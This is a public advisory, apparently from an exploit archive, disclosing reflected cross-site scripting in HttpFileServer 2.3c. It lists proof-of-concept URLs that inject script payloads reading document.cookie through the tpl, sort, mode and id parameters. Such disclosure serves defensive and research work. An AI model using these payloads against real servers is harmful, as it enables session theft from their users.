HttpFileServer 2.3c Cross Site Scripting

2014.09.25
Credit: Mahendra
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: HttpFileServer 2.3c Multiple Reflected Cross-site scripting # Date: 24-09-2014 # Remote: Yes # Exploit Author: Mahendra # Vendor Homepage: http://rejetto.com/ # Software Link: http://downloads.sourceforge.net/hfs/hfs2.3c.src.zip # Version: 2.3c # Tested on: Windows XP SP 3, Windows 7 The latest HTTP File Server (2.3c) was found to be vulnerable with multiple reflected cross-site scripting because the application did not properly validate user input. The proof of concept below only works on IE browser (tested on IE 6 and IE 11) ------------------------------------------------------------------- HFS Multiple Reflected Cross-site Scripting (XSS) ------------------------------------------------------------------- Proof of concepts: Affected parameters: tpl, sort, mode, id, and arbitrary parameter http://localhost/?tpl=list'/><script>alert(document.cookie)</script>&folders-filter=/&recursive http://localhost/?sort=n'/><script>alert(document.cookie)</script> http://localhost/?mode=n'/><script>alert(document.cookie)</script> http://localhost/?mode=section&id=style.css'/><script>alert(document.cookie)</script> http://localhost/?'onmouseover='alert(11)'


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top